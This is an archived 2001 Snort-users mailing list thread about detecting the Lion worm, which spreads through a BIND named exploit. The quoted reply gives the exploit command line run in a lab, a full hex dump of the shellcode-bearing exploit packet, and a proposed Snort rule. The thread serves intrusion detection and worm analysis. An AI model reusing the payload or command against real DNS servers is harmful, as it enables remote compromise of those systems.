1i0n (aka lion worm) RE: [Snort-users] New Worm Virus is in the wild

Max Vision
Sat Mar 24 16:18:14 EST 2001


Ok, here is the problem - and this is directly why my writeup is stalled -
is that I have a *different* strain of the worm.  Mine does not contain
the t0rn rootkit, and the exploit is different! "-v r" are not valid
options for the exploit I have (which after analysis I determined to be
released by LSD in February).

Can someone please forward a copy of your crew.tgz - only if it includes
the /lib/scan hierarchy - all crew.tgz downloaded March 23rd do not have
this (like mine).

The signature I mentioned always catches the worm strain I have (from
coollion.51.net on March 23rd, as well as the LSD exploit if run
separately.)

I suspect I just wasted a day of research time studying the "wrong" strain
of the worm.  Oh well, it's dead anyway, the ISP removed the file.

Again, I'm looking for a crew.tgz that is not 13365 bytes in size.

Thanks :)
Max

On Sat, 24 Mar 2001, Andreas Östling wrote:

> On Fri, 23 Mar 2001, Max Vision wrote:
>
> > I created a signature to detect this attack February 8th, when the exploit
> > was released (IDS482/named-exploit-tsig-infoleak) - I did this because LSD
> > were the first people to release a *decent* working bind exploit.  So I
> > wrote a signature for it... sure enough that is exactly what is used by
> > this worm.  People using vision.conf since February 8th should have seen
> > alerts for this attack (if the worm dropped by, whether it was successful
> > or not).
>
> Hmm.. so far I have seen the Lion worm executing the named exploit two
> times in the wild. However, the latest vision.conf did not catch it (but
> matching just "/bin/sh" on another Snort machine did).
>
> Here I successfully exploit named on a RH 6.2 on my home network by
> running "./bind 192.168.1.1 -v r" (using lib/scan/bind from crew.tgz),
> just like Lion does:
>
> 03/24-20:32:56.769354 192.168.1.3:1038 -> 192.168.1.1:53
> UDP TTL:64 TOS:0x0 ID:8792 IpLen:20 DgmLen:537
> Len: 517
> AB CD 01 00 00 02 00 00 00 00 00 01 3F 90 90 90  ............?...
> EB 3B 31 DB 5F 83 EF 7C 8D 77 10 89 77 04 8D 4F  .;1._..|.w..w..O
> 20 89 4F 08 B3 10 89 19 31 C9 B1 FF 89 0F 51 31   .O.....1.....Q1
> C0 B0 66 B3 07 89 F9 CD 80 59 31 DB 39 D8 75 0A  ..f......Y1.9.u.
> 66 BB 06 65 66 39 5E 02 74 08 E2 E0 3F E8 C0 FF  f..ef9^.t...?...
> FF FF 89 CB 31 C9 B1 03 31 C0 B0 3F 49 CD 80 41  ....1...1..?I..A
> E2 F6 EB 14 31 C0 5B 8D 4B 14 89 19 89 43 18 88  ....1.[.K....C..
> 43 07 31 D2 B0 0B CD 80 E8 E7 FF FF FF 2F 62 69  C.1........../bi
> 6E 2F 73 68 90 90 90 90 90 90 90 90 01 FA 01 BF  n/sh............
> 01 81 01 40 01 81 01 40 01 00 01 00 01 FB 01 BF  ...@...@........
> 01 FA 01 BF 01 00 01 00 01 00 01 00 01 8D 01 40  ...............@
> 01 FB 01 BF 01 52 01 40 01 00 01 00 01 FB 01 BF  .....R.@........
> 01 00 01 00 01 00 01 00 01 62 01 08 01 63 01 08  .........b...c..
> 01 64 01 08 01 FB 01 BF 01 62 01 08 01 FC 01 BF  .d.......b......
> 01 65 01 08 01 00 01 00 01 00 01 00 01 00 01 00  .e..............
> 01 00 01 00 01 00 01 00 01 80 01 40 01 00 01 00  ...........@....
> 01 85 01 08 01 62 01 08 01 FB 01 BF 00 00 01 00  .....b..........
> 01 01 12 01 88 01 FF 01 01 01 00 01 08 01 12 01  ................
> 06 01 00 01 14 01 FF 01 D4 01 FF 01 55 01 05 01  ............U...
> 60 01 0D 01 06 01 00 01 88 01 FF 01 01 01 00 01  `...............
> AC 01 05 01 B0 01 00 01 FC 01 FF 01 65 01 00 01  ............e...
> A4 01 FF 01 90 01 FF 01 4A 01 08 01 0C 01 00 01  ........J.......
> 60 01 0D 01 00 01 00 01 64 01 11 01 A4 01 BD 01  `.......d.......
> A4 01 FF 01 33 01 08 01 0C 01 00 01 00 01 00 01  ....3...........
> 00 01 00 01 74 01 FF 01 79 01 08 01 0C 01 00 01  ....t...y.......
> A4 01 FF 01 40 01 10 01 00 01 00 01 01 01 00 01  ....@...........
> 00 01 00 01 00 01 0D 01 00 01 0D 01 00 01 0D 01  ................
> 80 01 0D 01 80 01 0D 01 80 01 0D 01 80 01 0D 01  ................
> 80 01 0D 01 02 01 00 01 00 01 00 01 00 01 00 01  ................
> CC 01 11 01 B6 01 BD 01 00 01 00 01 A4 01 BD 10  ................
> 06 00 00 00 2D FA FF BF A0 A9 25 3B 00 FC FF BF  ....-.....%;....
> 01 A9 01 3B 00 00 01 00 01 00 00 FA FF           ...;.........
>
> As you can see, IDS482 (|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00
> 01 20 20 20 20 02 61|) does not match this packet.
>
> And another thing.
> The Lion worm can be pretty easily detected by watching for a port 53 SYN
> scan followed by an iquery followed by a named exploit, but I prefer also
> to have a specific rule to catch the actual worm, because that most likely
> means that the previous named exploit was successful.
> For example, something like:
>
> alert tcp any any -> any 53 (msg: "Attempt to set $PATH on port 53/TCP - possibly a successful Lion worm"; content:"PATH="; depth: 5; flags: AP;)
>
> Maybe something similar could be in arachNIDS?
> There are of course several other things you could look for to catch the
> worm. I don't think that the hosts "ifconfig -a" or "killall -HUP inetd"
> should be looked up in the DNS very often for example :)
>
> Regards,
> Andreas Östling
>
